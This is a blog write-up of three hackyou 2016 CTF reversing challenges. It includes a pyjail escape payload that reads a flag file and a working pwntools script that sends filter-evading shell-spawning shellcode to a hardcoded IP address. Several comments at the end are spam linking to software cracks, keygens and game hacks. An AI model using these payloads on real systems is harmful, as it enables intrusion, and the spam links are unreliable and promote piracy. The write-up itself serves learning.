hackyou.ctf.su 2016

This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.

Reverse 100:

#include <stdio.h>
#include <string.h>

int main() {
	char buf[64];
	gets(buf);
	int l = strlen(buf);
	if (l * l != 144)
		return 1;
	unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16);
	unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16);
	unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16);
	unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16);
	if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059))))
		return 2;
	if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931))))
		return 3;
	if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651))))
		return 4;
	if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510))))
		return 5;
	printf("Congratulations %s is flag\n",buf);
	return 0;
}

First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.

Reverse 200:
This is a .pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this

# Source Generated with Decompyle++
# File: rev200_bot_7b541a1.pyc (Python 2.7)

import config
import traceback
import re
from base64 import *
from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHide
sec_state = { }

def process_message(bot, u):
Warning: Stack history is not empty!
    if u.message.sender and u.message.text and u.message.chat:
        chat_id = u.message.chat.id
        user = u.message.sender.username
        reply_hide = ReplyKeyboardHide.create()
        print 'user:%s mes:%s' % (user, u.message.text)
        if user not in sec_state:
            sec_state[user] = {
                'mode': 15,
                'stage': 7 }
        cmd1 = u.message.text.encode('utf-8')
        a = re.findall('(\\/\\w+)\\s*(.*)', cmd1)
        if a:
            cmd = a[0][0]
            data = a[0][1]
            if cmd == '/help':
                bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide)
            if cmd == '/enter':
                keyboard = [
                    [
                        '-7-',
                        '-8-',
                        '-9-'],
                    [
                        '-4-',
                        '-5-',
                        '-6-'],
                    [
                        '-1-',
                        '-2-',
                        '-3-'],
                    [
                        '-0-']]
                reply_markup = ReplyKeyboardMarkup.create(keyboard)
                bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait()
            if sec_state[user]['mode'] == 0 and cmd == '/7779317':
                ddd = b64decode(data)
                bot.send_message(chat_id, eval(ddd))
            
        a = re.findall('-(\\d+)-', cmd1)
        if a:
            num = a[0]
            if int(num) == sec_state[user]['stage']:
                sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10
                sec_state[user]['mode'] = sec_state[user]['mode'] - 1
                if sec_state[user]['mode'] < 0:
                    sec_state[user]['mode'] = 0
                if sec_state[user]['mode'] == 0:
                    bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait()
                
            else:
                print 'NO', num, sec_state[user]['stage']
                bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait()
                sec_state[user]['mode'] = 15
        

bot = TelegramBot(config.token)
bot.update_bot_info().wait()
print bot.username
last_update_id = 0
while True:
    updates = bot.get_updates(offset = last_update_id).wait()
    
    try:
        for update in updates:
            if int(update.update_id) > int(last_update_id):
                last_update_id = update.update_id
                process_message(bot, update)
                continue
    continue
    except Exception:
        ex = None
        print traceback.format_exc()
        continue
    

So this is a kind of chat-bot server based on Telegram.
There is eval function inside,  bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;

#coding: utf-8
sec_state = { }
user = "A"
sec_state[user] = {
'mode': 15,
'stage': 7 } # bruteforce number
sec_state[user]['mode'] = 15
r = []
while 1:
	num = sec_state[user]['stage']
	r.append(num)
	print "-%d-" % num
	sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10
	sec_state[user]['mode'] = sec_state[user]['mode'] - 1
	if sec_state[user]['mode'] < 0:
	    sec_state[user]['mode'] = 0
	if sec_state[user]['mode'] == 0:
		break

print sec_state[user]['mode']

Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`

Reverse 300:
Let's get some fun.

let reverse this (or not?), look at handler (the main function)

ssize_t __cdecl handler(int fd)
{
  ssize_t result; // [email protected]
  unsigned int buf; // [sp+20h] [bp-18h]@1
  int v3; // [sp+24h] [bp-14h]@1
  char *v4; // [sp+28h] [bp-10h]@4
  int v5; // [sp+2Ch] [bp-Ch]@4

  buf = 0;
  setuid(0x3E8u);
  seteuid(0x3E8u);
  setgid(0x3E8u);
  setegid(0x3E8u);
  result = recv(fd, &buf, 4u, 0);
  v3 = result;
  if ( result == 4 )
  {
    result = buf;
    if ( buf <= 0xC8 )
    {
      v4 = (char *)mmap(0, buf, 7, 33, -1, 0);
      v3 = recv(fd, v4, buf, 0);
      result = crc32(0, v4, buf);
      v5 = result;
      if ( result == 0xCAFEBABE )
      {
        result = filter(v4, buf) ^ 1;
        if ( !(_BYTE)result )
          result = ((int (*)(void))v4)();
      }
    }
  }
  return result;
}

So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:

1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;

from pwn import *
import socket, struct, telnetlib
def getCRC(data):
	import subprocess
	with open('/tmp/12', 'wb') as f:
		f.write(data + "123456")
	subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE'])
	with open('/tmp/12', 'rb') as f:
		data = f.read()
	return data
def crc32(data):# recheck
	import zlib
	return (zlib.crc32(data)) & 0xffffffff


d = ""
d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))
d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))
# i need dup2 because the program use itself as server
d += asm(pwnlib.shellcraft.i386.linux.sh())

fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')

print len(fsc)
fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.
print hex(crc32(fsc))

#yes, i love my custom socket lib 🙁
s = socket.create_connection(("78.46.101.237", 3177))

s.send(p32(len(fsc)))
s.send(fsc)
s.send("\n")

s.send("cat flag*\n") 
print s.recv(1024)

To be continued....

2 thoughts on “hackyou.ctf.su 2016

  1. in [Reverse 100] problem, other simple way is to use Klee to solve

    #include
    #include
    #include

    #define ITERS 12
    int main() {
    char buf[ITERS];
    klee_make_symbolic(buf, ITERS, "012345");
    unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16);
    unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16);
    unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16);
    unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16);
    if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059))))
    return 2;
    if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931))))
    return 3;
    if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651))))
    return 4;
    if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510))))
    return 5;
    // printf("Congratulations %s is flag\n",buf);
    klee_assert(0);
    return 0;
    }

  2. IPL 2020, SRH vs RR highlights: Tewatia, Parag help RR win
    Project Cars 2 Deluxe Edition PC Crack + License Key 2020. No cricket before IPL hurting Steyns variations, says autojazz.ru.

    EDITING STROKE: EA SPORTS CRICKET 07
    DesignCAD 3D MAX 20.0 all versions serial number and http://keygen-designcad.autojazz.ru/. Answer Key Released on 10 November, 2020 resources. Serial Keys: Avira.AntiVir.Premium.v8.2.0.373 check my source. The Black Keys Rankings & Opinions. Pro Evolution Soccer 2020 (PES 2020) Cheats, Codes, Cheat. Office Tab Enterprise 14.00 with Full Crack. Norton Antivirus and Internet Security Software for sale. Free Hacks 2020: Hero Zero Hack. Top Football Manager Hack Online ... - Hack Generator Online. How to reset user options and registry settings in Word our site. Earthquake In Bhuj PowerPoint PPT ... visit this site. Keyboard shortcuts in Word - Office Support. Download FoxitPDFEditor221 1119 enu key serial number visit your url. Kaspersky Internet Security November 2020 Free License Key. Auto Software Download & InstallationAuto Repair. VSO Downloader Ultimate 5.1.1.70 Crack + Serial Key Full http://full-speed-hack-zing.autojazz.ru/. Diploma Cet Mechanical Question Paper. Free Download TuneUp Utilities 2020 Full version with . Norton antivirus 2020 free download full version with key webpage. Uniblue registry booster 2020 serial key free download.

    CRACK Windows 10 Enterprise 2020 LTSC X64 ESD En-US OCT
    Global Soccer Manager. ReiBoot Pro 7.4.0 Crack + Keygen 2020 Free Download autojazz.ru. How to find your windows 10 or office 365 product key. Wooden Slingshot With Green Patch - Slingshot Png . GUBI, Klubiensvej 7-9, Copenhagen (2020). MATLAB for Students - MATLAB & Simulink http://keygen-2014a-matlab-accelerator.autojazz.ru/. Voxal Voice Changer Crack 2020 Latest Software Easily linked here. Bhai Dooj 2020: Wishes Images, Messages, Status For. Download Quick Heal Total Security 19.00 (12.1.1.4). World Of Tanks Blitz Hack Download . PATCHED Adobe Illustrator 16.0 CS6 Installer + Crack http://illustrator-adobe-crack.autojazz.ru/. Dreadfiend of Nulgath (Armor) - AQW in 2020. How to Pair Bluetooth Headphones and Earphones. Foxit Pdf Editor V 221 License Key shaphy. Autodesk Maya 2020 Serial Key. With water scarce, Pakistan helps farmers grow more ... visit this site.

  3. Bhai Tika-Tihar - Shutter Up Creation and Photography
    It is being replaced with the new Z3x Easy JTAG PLUS Box This new designed Z3x Easy JTAG PLUS box has more advanced hardware to support more speed, flexibility and stability when performing direct eMMC read / write / repair funftions Z3X Easy-Jtag Box (Z3X-Pro) is a Jtag box made by Z3X Team. How To Set Up ADB/USB Drivers & Fastboot for Android 532-school.ru. Karbonn K451 vs LG GT540 Optimus Mobile Comparison - Compare Karbonn K451 vs LG GT540 Optimus Price in India, Camera, Size and other specifications at Gadgets Now. JSR 75, JSR 120, JSR 135, JSR 179, JSR 184, JSR 185, JSR 205, JSR 211, JSR 226.

    Dwecy
    Cak
    RAg
    Liedy
    hok
    guesy
    Hes
    vet
    Nen
    Snolo

  4. Navifirm Plus 3 2 freeware downloads - Free Navifirm Plus
    Framework 4.0 - New: Shows additional Product informations in the tooltip, including phone's image.
    Navifirm Plus 3.3 Free Download.
    Idea intellij 11 crack keygen. Simple Way On How To Hack Dead Trigger 2020. 10+ Best Bake mac and cheese images in 2020. Fifa 19 crack - FIFA 19 Download-PC-Game. /Crack-CpY/Codex. Dota 2 Installation... AGAIN. The Engineered Winter Deception, Chemical Ice Nucleation. Alien Skin Bokeh creatively defocuses photos - 42 West shkolamd.ru. Normal Class Quest Guide Level 1- 230. Shadow Fight 2 Hack Cheat Coins Gems Energy Perk shkolamd.ru. SlySoft CloneDVD (free version) download for PC web. Serial Number, Serial Numbers shkolamd.ru. Dragon naturally speaking torrent Free Download about his. Sony Products Multikeygen V1.3 Keygen And Patch Serial . Gladiatus Hack Gold and Rubies 2020! DOWNLOAD FREE . Download 8 Ball Pool Ruler Hack PC Tool Free For Long Link . Free online meeting scheduling tool http://able-hacked-games-doodle.shkolamd.ru/. Sony Vegas Pro v12.0 build 714 (x64) Full With Keymaker http://sony-build-vegas-patch.shkolamd.ru/. BF2 Playing Battlefield 2 in 2020? ?: Battlefield. Download Mod APK - Latest version of the best Android Mod. Steam Community: : Guide: : Party creation & character look at this website. Similar authors to follow - Amazon.com: Online Shopping http://crack-commandments-robohelp.shkolamd.ru/. How to legally get FL Studio for free. Federal 9 MM BPLE Self Defense Ammo http://9bple-hack.shkolamd.ru/. Gold Miner Special Edition - Free Download - Tucows Downloads. Serial number need for speed underground crack http://serial-number-underground.shkolamd.ru/. Biggie's "10 Crack Commandments" Being Used By Marc Ecko . Free Fl Studio Full Version. Spongebob Squarepants Diner Dash 2 Online Games. Zynga Poker Hack and Cheats shkolamd.ru. Digimon Re Digitize Psp English Patch Download. Srs audio essentials keygen megaupload crack. Dragon City Cheat Hack August 2020 Mobile/PC no password. Atomaders 2 Download Crack Gta. Download cheat engine free (windows) . Free Download Adventure Games - Gamers Maze - Free Torrent . Test Your Binary Skills With This Quiz! - ProProfs Quiz. Free channel studio pro 10.5 download.exe (Windows). Free version to PC Win get Intel I219-LM LAN Driver 12.15 shkolamd.ru. F1 Mobile Racing is set to receive a 2020 Season update in http://without-steam-patch.shkolamd.ru/. Tally ERP 9 Crack Release 6.5 Full Version - Fare Oak. Euro Truck Simulator 2 Patch Download. Watch Smallville Season 10 Episode 22: Finale, Part 2 http://smallville-finale-season-crack.shkolamd.ru/. IGI 2: Covert Strike - Internet Movie Firearms Database his response. Safe Softwares Website: DOWNLOAD WOW CATACLYSM 4.3.4 SPEED. Web easy pro 10 crack commandment. Serial Number Download - Smart Serials shkolamd.ru. Download call of duty modern warfare 2 crack only-razor1911 . POKEMON - WHITE VERSION 2 (FRIENDS) ROM - Roms Hub shkolamd.ru.

    Dwecy
    Cak
    RAg
    Liedy
    hok
    guesy
    Hes
    vet
    Nen
    Snolo

  5. 9Apps - wifi connect without password apk for Android
    Download hack wifi password android, hack wifi password android, hack wifi password android About this version.
    Wps Wpa Tester Premium 4.0.1 Cracked APK Mod .
    Tibia Old Server - Downloads: : Alternative Open Tibia Server http://hack-account-tibia.autojazz.ru/. Download Free Antivirus 2020 for PC, Android, iOS. Sonic CD 1.0.6 apk Free Download index. Hearts of iron patch 1.06c - ziajunami's blog . languages '' For the list of upcoming featur . Facebook Account Hacker V3.0 Free Download learn the facts here now. Cabrilog Cabri 3D V2.1.2 (7 Downloads). Geometry download - MathProf - Math program http://mathprof-keygen.autojazz.ru/. Movavi Video Suite 17.0.1 Full Version Download. Crysis Warhead Crack Only Tpbc http://crysis-only-crack.autojazz.ru/. Premium Softwares 4 u: Atomix Mp3 v2.3 Full with Serial Key . Claudia Whitechurch - Miami Beach, FL Real Estate Agent navigate to this website. TubeMate 3 - Free download and software reviews . Firmware for the wePresent SharePod - Software. Audio - Citroen C4 Coupe Radio (RD4-N1) - Unlocking Aux . Smith Mountain Laker magazine - July/August 2020 by browse around these guys. EFootball PES 2020 Online Option File V1 for PC and PS4 http://torrent-patch.autojazz.ru/. SpellForce Patch - Update v1.52 to v1.52a. Download DVD Shrink 3.2.0.15.0 for Windows this page. WinCHM-help authoring software - FREE Download WinCHM-help autojazz.ru. DVDx - Browse /4.1/4.1.10.0 at SourceForge.net. Minecraft - Free download and software reviews - CNET Download http://minecraft-cracked-extreme-team.autojazz.ru/. Adobe Photoshop CS6 with Crack . Stubbs.the.zombie.dvd-reloaded keygen download filehippo. Buy F1 2020 Steam PC - CD Key - Instant Delivery autojazz.ru. Skygrabber Pro 300 FULLrar Download autojazz.ru. Star Wars Empire at War Forces of Corruption PrimaGuides . AGB Cricket: FIRST TEST: THE GABBA. Free Download Toyota TIS Techstream 12.00.127 Crack 100%. Euro Truck Driving Simulator Transport Truck Games. Photodex Proshow Producer v5 0 3297 with Key. The Crew Serial Key Generator (PC, Xbox 360, Xbox ONE & PS4. Hiren Mini Xp Iso Download autojazz.ru. Free Download: Men Of War 2020 - breathing war. "Product: Toon Boom Studio 6.0, Flip Boom Classic 5.0. Dungeon Blitz Hack Unlimited Health by Cheat Engine http://unlimited-health-hack.autojazz.ru/. CASTROL EDGE PROFESSIONAL E C5 0W-20 http://professional-crack.autojazz.ru/. Abbyy Finereader 9.0 Professional Edition. COMPANY OF HEROES GOLD PATCH COMPANY OF HEROES GOLD PATCH find out here now. Latest Updates for Call of Duty: Modern Warfare autojazz.ru. IPhone SE is already cheap, but there's a way to save even. User manual of VideoCAD_7 Lite in PDF format. F1 2020 review: Finishing in first place - PC Invasion. Real-time translator-TouchTalk 3.2 Apk For Android OS autojazz.ru. Need QTP 10 or 11 Version Software and Oracle Add-in. Rhino News, etc.: Rhino 4.0 SR5b Released . Starcraft brood war 1 16 1 1 key capri unit. Crack La Fifa 08 Cdkey autojazz.ru.

    Dwecy
    Cak
    RAg
    Liedy
    hok
    guesy
    Hes
    vet
    Nen
    Snolo

Leave a Reply

Your email address will not be published. Required fields are marked *